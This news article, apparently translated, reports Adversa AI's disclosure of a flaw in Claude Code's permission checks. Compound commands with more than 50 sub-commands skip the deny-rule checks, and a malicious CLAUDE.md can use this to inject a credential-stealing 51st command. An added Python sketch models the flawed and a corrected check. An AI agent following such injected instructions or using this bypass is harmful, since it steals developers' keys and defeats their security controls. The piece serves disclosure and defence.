According to the latest update on April 7th, the security research firm Adversa AI discovered a critical, high-risk vulnerability during a deep review of the leaked Claude Code source code. The flaw is one that should make developers shudder: when the tool processes a compound command with more than 50 sub-commands, it silently bypasses all user-set security filtering rules.

Vulnerability Reproduction: The 51st Command Is "Invisible" Malicious Code

Claude Code, Anthropic's fastest-growing AI coding assistant, lets developers manage code repositories directly from the command line. To prevent sensitive data leaks, the system has built-in permission checks (such as prohibiting execution of curl or rm). However, researchers found that:

  • Stealth Bypass: If an attacker chains more than 50 sub-commands together using && or ;, Claude Code no longer checks each subsequent command individually.

  • Attack Path: Attackers only need to create an open-source repository containing a malicious CLAUDE.md file and trick developers into running it. The AI may generate harmless commands for the first 50, then insert instructions to steal SSH keys or API tokens on the 51st command, which the system will automatically allow.

The Root Cause: A Trade-off for UI Smoothness

Regrettably, this vulnerability stemmed not from technical incompetence but from a “performance compromise.”

  • Internal Ticket Records: An internal Anthropic ticket numbered CC-643 showed that engineers had found that running a separate security analysis on each part of a long compound command caused UI lag.

  • Assumption Broken: The development team believed that normal users would not enter more than 50 sub-commands, so they set 50 as the analysis limit and fell back to a “user-confirmation” mode for commands beyond that. However, they overlooked that AI prompt injection attacks can easily break this assumption about human behavior.

Irony of Reality: The Fix Was "Locked" in the Repository

Adversa AI's report indicated that Anthropic had actually developed a new parser based on tree-sitter, which can correctly verify security rules regardless of the command length. This mature code was already in the source code repository and had been tested, but for some reason, it was never applied to the production version delivered to customers.
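As an added illustration (not Anthropic's code and not taken from the Adversa AI report), the Python sketch below models the capped check described above next to a variant that applies the deny rules to every sub-command and never lets parser uncertainty weaken a deny. The function names, the regex-based splitter and the sample command are assumptions made for this example.

```python
import re

DENY = {"curl", "rm"}   # the two deny-rule examples the article names
CAP = 50                # the analysis limit the article describes

# Constructed simplification: split on shell control operators with a regex.
# A production checker needs a real shell grammar (the article mentions tree-sitter).
_SEP = re.compile(r"&&|\|\||[;&|\n]")
# Syntax this naive splitter cannot reason about safely.
_OPAQUE = re.compile(r"[`'\"\\(){}<>]|\$")
_ASSIGN = re.compile(r"[A-Za-z_]\w*=\S*")

def subcommands(cmd):
    return [p.strip() for p in _SEP.split(cmd) if p.strip()]

def program(sub):
    """First word that is not a VAR=value prefix, without its directory."""
    for word in sub.split():
        if not _ASSIGN.fullmatch(word):
            return word.rsplit("/", 1)[-1]
    return ""

def first_denied(subs):
    """Index of the first sub-command that hits a deny rule, or None."""
    return next((i for i, s in enumerate(subs) if program(s) in DENY), None)

def check_capped(cmd):
    """Model of the flawed behaviour: deny rules stop applying after CAP."""
    subs = subcommands(cmd)
    if first_denied(subs[:CAP]) is not None:
        return "deny"
    return "ask" if len(subs) > CAP else "allow"

def check_all(cmd):
    """Deny rules applied to every sub-command; uncertainty never weakens a deny."""
    if _OPAQUE.search(cmd):
        # Cannot split reliably: a denied name anywhere in the text still denies.
        return "deny" if DENY & set(re.findall(r"\w+", cmd)) else "ask"
    return "deny" if first_denied(subcommands(cmd)) is not None else "allow"

# Constructed input: 50 harmless sub-commands, then one covered by a deny rule.
SAMPLE = " && ".join(["true"] * 50 + ["curl example.invalid"])
```

On the constructed sample, check_capped degrades the verdict to a confirmation prompt while check_all still returns a deny, which is the difference between a hard deny rule and one a user can click through.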

Risk Assessment: Impacting 500,000 Developers, the "Safety Net" of a $2.5 Billion Product Now Has a Hole

Currently, this vulnerability has affected over 500,000 developers. Claude Code is a core product generating $2.5 billion (about 17.23 billion RMB) in annual recurring revenue for Anthropic, so the failure of its permission system means that the last line of defense for enterprise security teams has collapsed.

Latest Update: Officially Fixed

Fortunately, under the pressure of the “public audit” triggered by the source code leak, Anthropic released Claude Code v2.1.90 on April 4th. The release announcement described the fix as a “denied rules degradation caused by parsing failure fallback,” and the vulnerability has now been officially patched.

Security Recommendations:

The research team reminds developers not to treat an AI tool's built-in deny rules as the sole security boundary. Before running Claude Code on any unknown repository, be sure to audit its CLAUDE.md file and restrict the tool's shell access to the minimum necessary scope.